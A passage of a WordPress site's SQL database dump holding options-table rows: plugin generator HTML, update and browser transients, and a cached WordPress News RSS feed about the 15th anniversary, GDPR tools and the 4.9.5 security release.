class="fa fa-picture-o"></i>Slider</span>\n<span data-name="Carousel" data-shortcode="carousel" title="Customizable image carousel" data-desc="Customizable image carousel" data-group="gallery"><i class="fa fa-picture-o"></i>Carousel</span>\n<span data-name="Gallery" data-shortcode="custom_gallery" title="Customizable image gallery" data-desc="Customizable image gallery" data-group="gallery"><i class="fa fa-picture-o"></i>Gallery</span>\n<span data-name="Posts" data-shortcode="posts" title="Custom posts query with customizable template" data-desc="Custom posts query with customizable template" data-group="other"><i class="fa fa-th-list"></i>Posts</span>\n<span data-name="Dummy text" data-shortcode="dummy_text" title="Text placeholder" data-desc="Text placeholder" data-group="content"><i class="fa fa-text-height"></i>Dummy text</span>\n<span data-name="Dummy image" data-shortcode="dummy_image" title="Image placeholder with random image" data-desc="Image placeholder with random image" data-group="content"><i class="fa fa-picture-o"></i>Dummy image</span>\n<span data-name="Animation" data-shortcode="animate" title="Wrapper for animation. Any nested element will be animated" data-desc="Wrapper for animation. Any nested element will be animated" data-group="other"><i class="fa fa-bolt"></i>Animation</span>\n<span data-name="Meta" data-shortcode="meta" title="Post meta" data-desc="Post meta" data-group="data"><i class="fa fa-info-circle"></i>Meta</span>\n<span data-name="User" data-shortcode="user" title="User data" data-desc="User data" data-group="data"><i class="fa fa-info-circle"></i>User</span>\n<span data-name="Post" data-shortcode="post" title="Post data" data-desc="Post data" data-group="data"><i class="fa fa-info-circle"></i>Post</span>\n<span data-name="Template" data-shortcode="template" title="Theme template" data-desc="Theme template" data-group="other"><i class="fa fa-puzzle-piece"></i>Template</span>\n<span data-name="QR code" data-shortcode="qrcode" title="Advanced QR code generator" data-desc="Advanced QR code generator" data-group="content"><i class="fa fa-qrcode"></i>QR code</span>\n<span data-name="Scheduler" data-shortcode="scheduler" title="Allows to show the content only at the specified time period" data-desc="Allows to show the content only at the specified time period" data-group="other"><i class="fa fa-clock-o"></i>Scheduler</span>\n					</div>\r\n				</div>\r\n				<div id="su-generator-settings"></div>\r\n				<input type="hidden" name="su-generator-selected" id="su-generator-selected" value="http://clearyourbeliefs.com/wp-content/plugins/shortcodes-ultimate" />\r\n				<input type="hidden" name="su-generator-url" id="su-generator-url" value="http://clearyourbeliefs.com/wp-content/plugins/shortcodes-ultimate" />\r\n				<input type="hidden" name="su-compatibility-mode-prefix" id="su-compatibility-mode-prefix" value="su_" />\r\n				<div id="su-generator-result" style="display:none"></div>\r\n			</div>\r\n		</div>\r\n	', 'no'),
(108460, '_site_transient_browser_41ae052b7cb95d34944d8bb4821ad6cc', 'a:10:{s:4:"name";s:7:"Firefox";s:7:"version";s:4:"59.0";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:24:"https://www.firefox.com/";s:7:"img_src";s:44:"http://s.w.org/images/browsers/firefox.png?1";s:11:"img_src_ssl";s:45:"https://s.w.org/images/browsers/firefox.png?1";s:15:"current_version";s:2:"56";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(108969, '_transient_is_multi_author', '1', 'yes'),
(108971, '_transient_featured_content_ids', 'a:0:{}', 'yes'),
(108972, '_transient_doing_cron', '1525418600.3914289474487304687500', 'yes'),
(108970, '_transient_twentyfourteen_category_count', '5', 'yes'),
(108461, '_site_transient_timeout_community-events-2dc2d008faa71f75ac02e911e1393f94', '1524052336', 'no'),
(108462, '_site_transient_community-events-2dc2d008faa71f75ac02e911e1393f94', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"172.101.33.0";}s:6:"events";a:1:{i:0;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:15:"WordCamp Boston";s:3:"url";s:32:"https://2018.boston.wordcamp.org";s:6:"meetup";N;s:10:"meetup_url";N;s:4:"date";s:19:"2018-07-21 00:00:00";s:8:"location";a:4:{s:8:"location";s:6:"Boston";s:7:"country";s:2:"US";s:8:"latitude";d:42.352190100000001;s:9:"longitude";d:-71.117729800000006;}}}}', 'no'),
(105474, '_site_transient_timeout_browser_49da57eac7f840522fef2b86e883cffa', '1521720928', 'no'),
(108459, '_site_transient_timeout_browser_41ae052b7cb95d34944d8bb4821ad6cc', '1524613933', 'no'),
(107451, '_site_transient_update_core', 'O:8:"stdClass":4:{s:7:"updates";a:2:{i:0;O:8:"stdClass":10:{s:8:"response";s:7:"upgrade";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.9.5.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.9.5.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.9.5-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.9.5-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"4.9.5";s:7:"version";s:5:"4.9.5";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:0:"";}i:1;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.9.5.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.9.5.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.9.5-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.9.5-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"4.9.5";s:7:"version";s:5:"4.9.5";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:0:"";s:9:"new_files";s:1:"1";}}s:12:"last_checked";i:1525336192;s:15:"version_checked";s:5:"4.8.6";s:12:"translations";a:0:{}}', 'no'),
(108876, '_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1525183962', 'no');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(108877, '_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:14:"WordPress News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:26:"https://wordpress.org/news";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:14:"WordPress News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:34:"\n	Fri, 20 Apr 2018 21:07:41 +0000	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/?v=5.0-alpha-43041";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:50:"Celebrate the WordPress 15th Anniversary on May 27";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:86:"https://wordpress.org/news/2018/04/celebrate-the-wordpress-15th-anniversary-on-may-27/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 20 Apr 2018 21:07:29 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:6:"Events";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:5:"Store";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:4:"wp15";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5753";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:345:"May 27, 2018 is the 15th anniversary of the first WordPress release ﻿— and we can&#8217;t wait to celebrate! Party time! Join WordPress fans all over the world in celebrating the 15th Anniversary of WordPress by throwing your own party! Here&#8217;s how you can join in the fun: Check the WordPress 15th Anniversary website to see [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:16:"Andrea Middleton";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3948:"<p>May 27, 2018 is the <strong>15th anniversary</strong> of the <a href="https://wordpress.org/news/2003/05/wordpress-now-available/">first WordPress release</a> <a href="https://wordpress.org/news/2003/05/wordpress-now-available/">﻿</a>— and we can&#8217;t wait to celebrate!</p>\n\n<figure class="wp-block-image aligncenter"><img src="https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?resize=342%2C268&#038;ssl=1" alt="" class="wp-image-5841" width="342" height="268" srcset="https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?w=2188&amp;ssl=1 2188w, https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?resize=300%2C236&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?resize=768%2C605&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?resize=1024%2C806&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2018/04/wp15_mark-1.png?w=1896&amp;ssl=1 1896w" sizes="(max-width: 342px) 100vw, 342px" data-recalc-dims="1" /></figure>\n\n<h2>Party time!</h2>\n\n<p>Join WordPress fans all over the world in celebrating the 15th Anniversary of WordPress by throwing your own party! Here&#8217;s how you can join in the fun:</p>\n\n<ol>\n    <li>Check the <a href="https://wp15.wordpress.net/about/">WordPress 15th Anniversary website</a> to see if there&#8217;s a party already planned for your town. If there is, RSVP for the party and invite your friends!<br /></li>\n    <li>If there isn&#8217;t, then pick a place to go where a bunch of people can be merry — a park, a pub, a backyard; any family-friendly venue will do!</li>\n    <li>List your party with <a href="https://www.meetup.com/pro/wordpress/">your local WordPress meetup group</a> (Don&#8217;t have a group? <a href="https://make.wordpress.org/community/handbook/meetup-organizer/welcome/#starting-a-new-meetup-com-group">Start one!</a>)  and then spread the word to other local meetups, tech groups, press, etc and get people to say they’ll come to your party.</li>\n    <li><a href="https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/wordpress-15th-anniversary-celebrations/#request-wordpress-15th-anniversary-swag">Request</a> some special 15th anniversary WordPress swag (no later than April 27, please, so we have time to ship it to you).<br /></li>\n    <li>Have party attendees post photos, videos, and the like with the #WP15 hashtag, and <a href="https://wp15.wordpress.net/live/">check out the social media stream</a> to see how the rest of the world is sharing and celebrating.</li>\n</ol>\n\n<p>Don&#8217;t miss this chance to participate in a global celebration of WordPress!<br /></p>\n\n<h2>Special Swag</h2>\n\n<p>In honor of the 15th anniversary, we’ve added some <a href="https://mercantile.wordpress.org/product-category/wordpress-15/">special 15th anniversary items</a> in the swag store — you can use the offer code <strong>CELEBRATEWP15</strong> to take 15% off this (and any other WordPress swag you buy), all the way through the end of 2018!</p>\n\n<p>Keep checking the swag store, because we&#8217;ll be adding more swag over the next few weeks!</p>\n\n<h2>Share the fun</h2>\n\n<p>However you celebrate the WordPress 15th anniversary — with <a href="https://wp15.wordpress.net/about/">a party</a>, with <a href="https://wp15.wordpress.net/swag/">commemorative swag</a>, by <a href="https://wp15.wordpress.net/live/">telling the world</a> what WordPress means to you — remember to use the #WP15 hashtag to share it! And don&#8217;t forget to <a href="https://wp15.wordpress.net/live/">check the stream of WordPress 15th anniversary posts</a>.</p>\n\n<p>When <a href="https://venturebeat.com/2018/03/05/wordpress-now-powers-30-of-websites/">30% of the internet</a> has a reason to celebrate, you know it&#8217;s going to be great! </p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5753";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:34:"GDPR Compliance Tools in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:70:"https://wordpress.org/news/2018/04/gdpr-compliance-tools-in-wordpress/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 12 Apr 2018 20:11:50 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Features";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5728";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:188:"GDPR compliance is an important consideration for all WordPress websites. The GDPR Compliance team is looking for help to test the privacy tools that are currently being developed in core.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Andrew Ozz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3914:"<p>GDPR compliance is an important consideration for all WordPress websites. The GDPR Compliance team is looking for help to test the privacy tools that are currently being developed in core. </p>\n\n<h2>What is GDPR?</h2>\n\n<p>GDPR stands for <a href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation">General Data Protection Regulation</a> and is intended to strengthen and unify data protection for all individuals within the European Union. Its primary aim is to give control back to the EU residents over their personal data. <br /></p>\n\n<p>Why the urgency? Although the GDPR was introduced two years ago, it becomes  enforceable starting May 25, 2018.</p>\n\n<h2>Make WordPress GDPR Compliance Team</h2>\n\n<p>Currently, the GDPR Compliance Team understands that helping WordPress-based sites become compliant is a large and ongoing task. The team is focusing on creating a comprehensive core policy, plugin guidelines, privacy tools and documentation. All of this requires your help.<br /></p>\n\n<p>The GDPR Compliance Team is focusing on four main areas:</p>\n\n<ul>\n    <li>Add functionality to assist site owners in creating comprehensive privacy policies for their websites.</li>\n    <li>Create guidelines for plugins to become GDPR ready.</li>\n    <li>Add administration tools to facilitate compliance and encourage user privacy in general.</li>\n    <li>Add documentation to educate site owners on privacy, the main GDPR compliance requirements, and on how to use the new privacy tools.</li>\n</ul>\n\n<h2>Don’t we already have a privacy policy?</h2>\n\n<p>Yes and no. That said, The GDPR puts tighter guidelines and restrictions. Though we have many plugins that create privacy pages, we need means to generate a unified, comprehensive privacy policy. We will need tools for users to easily come into compliance.<br /></p>\n\n<p>Site owners will be able to create GDPR compliant privacy policy in three steps:</p>\n\n<ol>\n    <li>Adding a dedicated page for the policy.<br /></li>\n    <li>Adding privacy information from plugins.</li>\n    <li>Reviewing and publishing the policy.</li>\n</ol>\n\n<p>A new &#8220;postbox&#8221; will be added to the Edit Page screen when editing the policy. All plugins that collect or store user data will be able to add privacy information there. In addition it will alert the site owners when any privacy information changes after a plugin is activated, deactivated, or updated.<br /></p>\n\n<p>There is a new functionality to confirm user requests by email address. It is intended for site owners to be able to verify requests from users for displaying, downloading, or anonymizing of personal data.<br /></p>\n\n<p>A new &#8220;Privacy&#8221; page is added under the &#8220;Tools&#8221; menu. It will display new, confirmed requests from users, as well as already fulfilled requests. It will also contain the tools for exporting and anonymizing of personal data and for requesting email confirmation to avoid abuse attempts.<br /></p>\n\n<p>New section on privacy will be added to the <a href="https://developer.wordpress.org/plugins/">Plugin Handbook</a>. It will contain some general information on user privacy, what a plugin should do to be compliant, and also tips and examples on how to use the new privacy related functionality in WordPress.<br /></p>\n\n<p>The new privacy tools are scheduled for release at the end of April or beginning of May 2018.</p>\n\n<h2>How can you get involved?</h2>\n\n<p>We would love to have your help. The first step is awareness and education. For more information about the upcoming privacy tools see ﻿<a href="https://make.wordpress.org/core/2018/03/28/roadmap-tools-for-gdpr-compliance/">the roadmap</a>.</p>\n\n<p>If you would like to get involved in building WordPress Core and testing the new privacy tools, please join the #gdpr-compliance channel in the <a href="https://make.wordpress.org/chat/">Make WordPress</a> Slack group.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5728";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:36:"\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:48:"WordPress 4.9.5 Security and Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:84:"https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 03 Apr 2018 19:56:54 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:3:"4.9";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5645";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:376:"WordPress 4.9.5 is now available. This is a security and maintenance release for all versions since WordPress 3.7. We strongly encourage you to update your sites immediately. WordPress versions 4.9.4 and earlier are affected by three security issues. As part of the core team&#x27;s ongoing commitment to security hardening, the following fixes have been implemented [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:17:"Aaron D. Campbell";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:6347:"<p>WordPress 4.9.5 is now available. This is a <strong>security and maintenance release</strong> for all versions since WordPress 3.7. We strongly encourage you to update your sites immediately.</p>\n\n<p>WordPress versions 4.9.4 and earlier are affected by three security issues. As part of the core team&#x27;s ongoing commitment to security hardening, the following fixes have been implemented in 4.9.5:</p>\n\n<ol>\n    <li>Don&#x27;t treat <code>localhost</code> as same host by default.</li>\n    <li>Use safe redirects when redirecting the login page if SSL is forced.</li>\n    <li>Make sure the version string is correctly escaped for use in generator tags.</li>\n</ol>\n\n<p>Thank you to the reporters of these issues for practicing <a href="https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/">﻿coordinated security disclosure</a>: <a href="https://profiles.wordpress.org/xknown">xknown</a> of the WordPress Security Team, <a href="https://hackerone.com/nitstorm">Nitin Venkatesh (nitstorm)</a>, and <a href="https://twitter.com/voldemortensen">Garth Mortensen</a> of the WordPress Security Team.</p>\n\n<p>Twenty-five other bugs were fixed in WordPress 4.9.5. Particularly of note were:</p>\n\n<ul>\n    <li>The previous styles on caption shortcodes have been restored.</li>\n    <li>Cropping on touch screen devices is now supported.</li>\n    <li>A variety of strings such as error messages have been updated for better clarity.</li>\n    <li>The position of an attachment placeholder during uploads has been fixed.</li>\n    <li>Custom nonce functionality in the REST API JavaScript client has been made consistent throughout the code base.</li>\n    <li>Improved compatibility with PHP 7.2.</li>\n</ul>\n\n<p><a href="https://make.wordpress.org/core/2018/04/03/wordpress-4-9-5/">This post has more information about all of the issues fixed in 4.9.5 if you&#x27;d like to learn more</a>.</p>\n\n<p><a href="https://wordpress.org/download/">Download WordPress 4.9.5</a> or venture over to Dashboard → Updates and click &quot;Update Now.&quot; Sites that support automatic background updates are already beginning to update automatically.</p>\n\n<p>Thank you to everyone who contributed to WordPress 4.9.5:</p>\n\n<p><a href="https://profiles.wordpress.org/1265578519-1/">1265578519</a>, <a href="https://profiles.wordpress.org/jorbin/">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/adamsilverstein/">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/schlessera/">Alain Schlesser</a>, <a href="https://profiles.wordpress.org/alexgso/">alexgso</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/andrei0x309/">andrei0x309</a>, <a href="https://profiles.wordpress.org/antipole/">antipole</a>, <a href="https://profiles.wordpress.org/aranwer104/">Anwer AR</a>, <a href="https://profiles.wordpress.org/birgire/">Birgir Erlendsson (birgire)</a>, <a href="https://profiles.wordpress.org/blair-jersyer/">Blair jersyer</a>, <a href="https://profiles.wordpress.org/bandonrandon/">Brooke.</a>, <a href="https://profiles.wordpress.org/chetan200891/">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/codegrau/">codegrau</a>, <a href="https://profiles.wordpress.org/conner_bw/">conner_bw</a>, <a href="https://profiles.wordpress.org/davidakennedy/">David A. Kennedy</a>, <a href="https://profiles.wordpress.org/designsimply/">designsimply</a>, <a href="https://profiles.wordpress.org/dd32/">Dion Hulse</a>, <a href="https://profiles.wordpress.org/ocean90/">Dominik Schilling (ocean90)</a>, <a href="https://profiles.wordpress.org/electricfeet/">ElectricFeet</a>, <a href="https://profiles.wordpress.org/ericmeyer/">ericmeyer</a>, <a href="https://profiles.wordpress.org/fpcsjames/">FPCSJames</a>, <a href="https://profiles.wordpress.org/garrett-eclipse/">Garrett Hyder</a>, <a href="https://profiles.wordpress.org/pento/">Gary Pendergast</a>, <a href="https://profiles.wordpress.org/soulseekah/">Gennady Kovshenin</a>, <a href="https://profiles.wordpress.org/henrywright/">Henry Wright</a>, <a href="https://profiles.wordpress.org/audrasjb/">Jb Audras</a>, <a href="https://profiles.wordpress.org/jbpaul17/">Jeffrey Paul</a>, <a href="https://profiles.wordpress.org/jipmoors/">Jip Moors</a>, <a href="https://profiles.wordpress.org/joemcgill/">Joe McGill</a>, <a href="https://profiles.wordpress.org/joen/">Joen Asmussen</a>, <a href="https://profiles.wordpress.org/johnbillion/">John Blackbourn</a>, <a href="https://profiles.wordpress.org/johnpgreen/">johnpgreen</a>, <a href="https://profiles.wordpress.org/junaidkbr/">Junaid Ahmed</a>, <a href="https://profiles.wordpress.org/kristastevens/">kristastevens</a>, <a href="https://profiles.wordpress.org/obenland/">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/lakenh/">Laken Hafner</a>, <a href="https://profiles.wordpress.org/lancewillett/">Lance Willett</a>, <a href="https://profiles.wordpress.org/leemon/">leemon</a>, <a href="https://profiles.wordpress.org/melchoyce/">Mel Choyce</a>, <a href="https://profiles.wordpress.org/mikeschroder/">Mike Schroder</a>, <a href="https://profiles.wordpress.org/mrmadhat/">mrmadhat</a>, <a href="https://profiles.wordpress.org/nandorsky/">nandorsky</a>, <a href="https://profiles.wordpress.org/jainnidhi/">Nidhi Jain</a>, <a href="https://profiles.wordpress.org/swissspidy/">Pascal Birchler</a>, <a href="https://profiles.wordpress.org/qcmiao/">qcmiao</a>, <a href="https://profiles.wordpress.org/rachelbaker/">Rachel Baker</a>, <a href="https://profiles.wordpress.org/larrach/">Rachel Peter</a>, <a href="https://profiles.wordpress.org/ravanh/">RavanH</a>, <a href="https://profiles.wordpress.org/otto42/">Samuel Wood (Otto)</a>, <a href="https://profiles.wordpress.org/sebastienthivinfocom/">Sebastien SERRE</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/shital-patel/">Shital Marakana</a>, <a href="https://profiles.wordpress.org/netweb/">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/karmatosed/">Tammie Lister</a>, <a href="https://profiles.wordpress.org/thomas-vitale/">Thomas Vitale</a>, <a href="https://profiles.wordpress.org/kwonye/">Will Kwon</a>, and <a href="https://profiles.wordpress.org/yahil/">Yahil Madakiya</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5645";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			